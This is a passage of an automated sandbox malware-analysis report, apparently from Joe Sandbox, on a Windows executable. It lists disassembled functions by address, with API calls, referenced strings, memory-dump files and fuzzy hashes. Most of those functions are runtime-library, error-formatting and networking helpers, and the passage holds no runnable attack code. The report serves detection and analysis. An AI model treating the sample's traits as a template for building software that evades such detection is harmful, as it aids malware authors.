Instruction Fuzzy Hash: BA113C10E0920347FF68B6B154565BA91A14F55370FDA2B3CD93D2A2DADFECB41242F2

Function 00007FF7F1317DE4 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F13180C3

Part of subcall function 00007FF7F1305E1C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1305E39

Strings

UTF-16LEUNICODE, xrefs: 00007FF7F1318061
ccs, xrefs: 00007FF7F1317FFE
UTF-8, xrefs: 00007FF7F1318042

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: c92aa55c122d9f564a042f34397ad49531f7756b2213ca6cca04c5fa59226e14
Instruction ID: 529bb8f1a59659ff8d98744cee86f409958a9f91258a0b2a098dc6d85bf5eee5
Opcode Fuzzy Hash: c92aa55c122d9f564a042f34397ad49531f7756b2213ca6cca04c5fa59226e14
Instruction Fuzzy Hash: 3881C732D0820287F7656F25C154279E6A0AF11B64FDB803CDA2D772D6CBADF90587B1

Function 00007FF7F1317B20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1317DC9

Part of subcall function 00007FF7F1326854: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1326871

Strings

ccs, xrefs: 00007FF7F1317D15
UTF-16LEUNICODE, xrefs: 00007FF7F1317D6D
UTF-8, xrefs: 00007FF7F1317D4C

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 9a5701430e8243679f1243c237cd0e6dc721751d47cd0d60951dd46ee1703780
Instruction ID: 0971fc4035d22d01b71743447cccc7a3c114f42165dcfaeeeafb110b620b4faf
Opcode Fuzzy Hash: 9a5701430e8243679f1243c237cd0e6dc721751d47cd0d60951dd46ee1703780
Instruction Fuzzy Hash: F481C572D0C10647FB756A388154279AA909F15B64FEF903CCA2A632D7CBADB84193E1

Function 00007FF7F1300AF8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7F1300B68
_CallSETranslator.LIBVCRUNTIME ref: 00007FF7F1300BB3

Strings

MOC, xrefs: 00007FF7F1300B7C
RCC, xrefs: 00007FF7F1300B84

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 2d364d95687243c3b181cd46417f204310557b77680859db5af2121501d26352
Instruction ID: 90084448824a84e74b486953e519f2c738e1db459ebaecc6f46c28bf414ded6f
Opcode Fuzzy Hash: 2d364d95687243c3b181cd46417f204310557b77680859db5af2121501d26352
Instruction Fuzzy Hash: 2A910173A08B858AE710EB64D8402ACBBE0FB05788F54413AEE9D57B99DF78D192C750

Function 00007FF7F1300888 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7F13008E7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF7F1300933

Strings

MOC, xrefs: 00007FF7F13008FB
RCC, xrefs: 00007FF7F1300903

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: ccc5e4b4fc8220aa2e3a5c7290e89e745588f29462f2b8ea79782d41b13f63ab
Instruction ID: da7613e7bfd79fdb7ebe67c51d018fe363852d581e7d26e0926be74f5ab91f12
Opcode Fuzzy Hash: ccc5e4b4fc8220aa2e3a5c7290e89e745588f29462f2b8ea79782d41b13f63ab
Instruction Fuzzy Hash: F66194329087C586E760AB15E4407AAB7A0FB857D8F444239EBAC53B99DFBCD190CB50

Function 00007FF7F12F2945 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 108COMMON

Download Yara Rule

APIs

SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F2969

Strings

Signature Algorithm, xrefs: 00007FF7F12F2E1D, 00007FF7F12F2E44
Serial Number, xrefs: 00007FF7F12F2D3A, 00007FF7F12F2D61
%s: %s, xrefs: 00007FF7F12F2D68, 00007FF7F12F2E4B

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=
String ID: %s: %s$Serial Number$Signature Algorithm
API String ID: 356670603-1527603233
Opcode ID: d24cd0fb2c974990b245698adadf8b60b22e90d8d7b5c51932e451f50a7ff387
Instruction ID: d87537addd334a83dbe0082455000580bbfc6f7d6280106e39e32cc056490b6e
Opcode Fuzzy Hash: d24cd0fb2c974990b245698adadf8b60b22e90d8d7b5c51932e451f50a7ff387
Instruction Fuzzy Hash: F2419B21B0878755FB10ABA194501F9ABA1BF15788FC40436DE7E976CAEFBCE504C7A0

Function 00007FF7F1295A20 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 00007FF7F1295AB9
_Maklocstr.LIBCPMT ref: 00007FF7F1295ACF

Strings

true, xrefs: 00007FF7F1295AC8
false, xrefs: 00007FF7F1295AB2

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Maklocstr
String ID: false$true
API String ID: 2987148671-2658103896
Opcode ID: 7737890b09bf963c193fc8e8b8f852c338a03559dd738bd0465b522fbd767e66
Instruction ID: dc66080caaa849c9f84060e099f05223aad4450256f95c31caea1aeb1d663783
Opcode Fuzzy Hash: 7737890b09bf963c193fc8e8b8f852c338a03559dd738bd0465b522fbd767e66
Instruction Fuzzy Hash: 5E419923B08B459AE700DF74E4002ED73B4FB84B48F801526EE5D53A99EF78E5A5C394

Function 00007FF7F1322C3C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,COMSPEC,00007FF7F1313893), ref: 00007FF7F1322C55
FreeEnvironmentStringsW.KERNEL32(?,?,COMSPEC,00007FF7F1313893), ref: 00007FF7F1322CC7

Part of subcall function 00007FF7F131B604: HeapAlloc.KERNEL32(?,?,00000000,00007FF7F1316B40,?,?,?,?,?,?,00000001,?,?,?,00000001,00007FF7F13169F6), ref: 00007FF7F131B642

FreeEnvironmentStringsW.KERNEL32(?,?,COMSPEC,00007FF7F1313893), ref: 00007FF7F1322D26

Part of subcall function 00007FF7F131B6E0: RtlFreeHeap.NTDLL(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B6F6
Part of subcall function 00007FF7F131B6E0: GetLastError.KERNEL32(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B700

Strings

COMSPEC, xrefs: 00007FF7F1322C4F

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
String ID: COMSPEC
API String ID: 3331406755-1631433037
Opcode ID: bb1d59d09e9cb0386528951414e0698b901e226b3cb9b14e083c89a35899e292
Instruction ID: bcb942ce49f73547fe06bd16afd778aea0643d2409833946fd0185f54d71cd55
Opcode Fuzzy Hash: bb1d59d09e9cb0386528951414e0698b901e226b3cb9b14e083c89a35899e292
Instruction Fuzzy Hash: 9331C931A0879582EB24BF116840079F6A4BF54FE4F84463DE96E537C5DF7CE4118390

Function 00007FF7F12F5261 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F5291
SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F56C0

Strings

FALSE, xrefs: 00007FF7F12F5282
TRUE, xrefs: 00007FF7F12F527B

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=
String ID: FALSE$TRUE
API String ID: 356670603-1412513891
Opcode ID: 4a6b7114147a74c34009b339fb4e256dc4e2b5828f54061223e5db19ee48ab58
Instruction ID: bef7554368dd4b46d2ad1757b42e1687c51953b3dd9f5c49d8532fc85f7207e4
Opcode Fuzzy Hash: 4a6b7114147a74c34009b339fb4e256dc4e2b5828f54061223e5db19ee48ab58
Instruction Fuzzy Hash: 3D21D621B1D65746FB11B7A995501B9A7D2AF01394FC00431CABEC66DAEFDCE90187F0

Function 00007FF7F12D0D00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FF7F12D0D3F
WSAGetLastError.WS2_32 ref: 00007FF7F12D0D49

Strings

Sending data failed (%d), xrefs: 00007FF7F12D0D4F
SENT, xrefs: 00007FF7F12D0D64

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLastsend
String ID: SENT$Sending data failed (%d)
API String ID: 1802528911-3459338696
Opcode ID: f3d2537a36d7e6df86f749ee41553c9ddf7e7b30c03e48f4caab14ad97f4c1df
Instruction ID: 5e59da528a4db9e28d9de3d287ae1b0e46bbbe4c1410c6cb9bdfe9c21c5e3864
Opcode Fuzzy Hash: f3d2537a36d7e6df86f749ee41553c9ddf7e7b30c03e48f4caab14ad97f4c1df
Instruction Fuzzy Hash: 2F012022B1C6C141D7209B5AF44006AAB10FF94BD0F946035FE6E87BA5CF6DD041C7D0

Function 00007FF7F13363B4 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1336411
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1336475
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F13364D9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F133653D

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: aa204f485674e588fe7e754ceb877947d4ba4a4b5d4867f3f81bcba004f98202
Instruction ID: 7347fdb7687e458ad4d066c3ef671e56f7b09b22a7bf69266e0c318a219ab8b0
Opcode Fuzzy Hash: aa204f485674e588fe7e754ceb877947d4ba4a4b5d4867f3f81bcba004f98202
Instruction Fuzzy Hash: E741D3A1F0D58A86FB08BB19E854378D711AF42B84FD00039D67C0A6D6DFEDA58483E4

Function 00007FF7F12C5AB0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,00007FF7F12ADC46), ref: 00007FF7F12C5AD3
GetLastError.KERNEL32(?,?,?,?,?,00007FF7F12ADC46), ref: 00007FF7F12C5BAA
SetLastError.KERNEL32(?,?,?,?,?,00007FF7F12ADC46), ref: 00007FF7F12C5BB6

Strings

Unknown error %d (%#x), xrefs: 00007FF7F12C5B44

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: Unknown error %d (%#x)
API String ID: 1452528299-2414550090
Opcode ID: 808d83368b5eca47f01ac30d58b2734cfcc88167ac817675af53d9ab8e0d4f3e
Instruction ID: 5b2a902ae5ac019e53723bb5bc313f56f6c559e579998223ebfdbb1622d43d30
Opcode Fuzzy Hash: 808d83368b5eca47f01ac30d58b2734cfcc88167ac817675af53d9ab8e0d4f3e
Instruction Fuzzy Hash: CC318021B0868242FB157FA19410279E691AF84B94FC84035DF6E977DAEFBCE401CBB1

Function 00007FF7F12C5BE0 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5C02
GetLastError.KERNEL32 ref: 00007FF7F12C5C58
SetLastError.KERNEL32 ref: 00007FF7F12C5C64

Strings

Unknown error %lu (0x%08lX), xrefs: 00007FF7F12C5C36

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: Unknown error %lu (0x%08lX)
API String ID: 1452528299-1512744739
Opcode ID: 45db52d129272514d344d2c5257cb41e6a734851ed561a874b77d377912fd4e0
Instruction ID: 97582bdc1a97d8b4daca51c312d2c4cbdc0dd6374f52423a3e4722058918d0c6
Opcode Fuzzy Hash: 45db52d129272514d344d2c5257cb41e6a734851ed561a874b77d377912fd4e0
Instruction Fuzzy Hash: 50118F32B0874282E7107F62A80006AF791AF84B90F880038DF5D437D6DFBCE5419BA5

Function 00007FF7F12C544F Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

SEC_E_CONTEXT_EXPIRED, xrefs: 00007FF7F12C544F
%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_CONTEXT_EXPIRED
API String ID: 1452528299-1358876214
Opcode ID: 49259ef3f97740b7bcc8aa33aa8235c920244522c04d52131931d69f9ac3b840
Instruction ID: bd62504da963e5153920a1a95d0c0a5079e0c142b9421e71a3a4bf648da43945
Opcode Fuzzy Hash: 49259ef3f97740b7bcc8aa33aa8235c920244522c04d52131931d69f9ac3b840
Instruction Fuzzy Hash: 8D019222B1864286F711BF91A4401FAE291EF847A4FC80136DA1E427D1DFBCE581CBB0

Function 00007FF7F12C5443 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

SEC_E_CERT_WRONG_USAGE, xrefs: 00007FF7F12C5443
%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_CERT_WRONG_USAGE
API String ID: 1452528299-3896346274
Opcode ID: bea25d0c387407e89af487cf51dd4070dac09ee8df95682c15afe5d7cc2464b0
Instruction ID: 04bcfa0949c6fa95fa06a91cc76c0c0a0510ec9c3740775eadef08585bb0c61a
Opcode Fuzzy Hash: bea25d0c387407e89af487cf51dd4070dac09ee8df95682c15afe5d7cc2464b0
Instruction Fuzzy Hash: 65019222B0864286F711BF91A4401FAE391EF847A4FC80136EA1E427C5DFBCE581CBB0

Function 00007FF7F12C5437 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC
SEC_E_CERT_UNKNOWN, xrefs: 00007FF7F12C5437

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_CERT_UNKNOWN
API String ID: 1452528299-169894802
Opcode ID: 5fc6a23aecc3f71f451275b01cec7b1dc1d9d2629abf6af712ce95fe702ab1a0
Instruction ID: c86e2d0d776f3e36ad73dda9e70f79aa5f2de6225ed706a9c2601db8e2c15eeb
Opcode Fuzzy Hash: 5fc6a23aecc3f71f451275b01cec7b1dc1d9d2629abf6af712ce95fe702ab1a0
Instruction Fuzzy Hash: DB019222B0864286F711BF91A4401FAE291EF847A4FC80136DA1E467C1DFBCE581CBB0

Function 00007FF7F12C542E Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

SEC_E_CERT_EXPIRED, xrefs: 00007FF7F12C542E
%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_CERT_EXPIRED
API String ID: 1452528299-3192465694
Opcode ID: 2ce6dc1366a28d8a0c545d03e831b4990b72eb4646446e073adc300a0cc3962d
Instruction ID: 9980d482ee3eda7fdfb3248e706045394209b3092f6db6c22f36d2a6827752e4
Opcode Fuzzy Hash: 2ce6dc1366a28d8a0c545d03e831b4990b72eb4646446e073adc300a0cc3962d
Instruction Fuzzy Hash: 98019222B0864286F711BF91A4401FAE291EF847A4FC80136EA1E427D1DFBCE581CBB0

Function 00007FF7F12C5425 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

SEC_E_CANNOT_PACK, xrefs: 00007FF7F12C5425
%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: %s (0x%08X) - %s$SEC_E_CANNOT_PACK
API String ID: 1452528299-1144097955
Opcode ID: 7ecb94198fa92746fdb32a5ff9d868647b4336e66989237da6fa02f9a96f4bf0
Instruction ID: 63c00ce89605eb7a55521f54332cbdb2ead642be1828e21261c1a9a397db4019
Opcode Fuzzy Hash: 7ecb94198fa92746fdb32a5ff9d868647b4336e66989237da6fa02f9a96f4bf0
Instruction Fuzzy Hash: EC019222B0864286F711BF91E4401FAE291EF847A4FC80136DA1E427C1DFBCE581CBB0

Function 00007FF7F12C541C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F12C5884
SetLastError.KERNEL32 ref: 00007FF7F12C5892

Strings

SEC_E_CANNOT_INSTALL, xrefs: 00007FF7F12C541C
%s (0x%08X) - %s, xrefs: 00007FF7F12C53EC

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

